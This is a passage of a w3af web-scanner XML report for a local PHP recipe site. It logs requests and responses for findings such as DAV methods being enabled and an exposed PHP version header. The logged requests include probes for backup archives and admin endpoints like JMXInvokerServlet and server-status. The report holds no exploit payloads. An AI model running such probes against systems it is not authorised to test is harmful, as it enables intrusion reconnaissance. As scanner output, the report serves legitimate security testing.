                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="217">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="99">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="100">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="104">
                <http-request>
                    <status>GET http://10.12.68.43:31337/AKpPe.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/AKpPe.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[47]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="47">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[87]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="87">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[36, 63, 74, 90, 223, 251, 253, 328, 369, 398, 413, 452, 480, 487, 504, 555, 568, 578, 589, 618, 634, 646, 664, 700, 717]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="36">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="63">
                <http-request>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="74">
                <http-request>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="90">
                <http-request>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </http-response>
            </http-transaction>
            <http-transaction id="223">
                <http-request>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="251">
                <http-request>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="253">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="328">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="413">
                <http-request>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="452">
                <http-request>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="480">
                <http-request>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="487">
                <http-request>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="504">
                <http-request>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="555">
                <http-request>
                    <status>MKWORKSPACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="close" field="connection"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /* has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/*'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="568">
                <http-request>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="578">
                <http-request>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
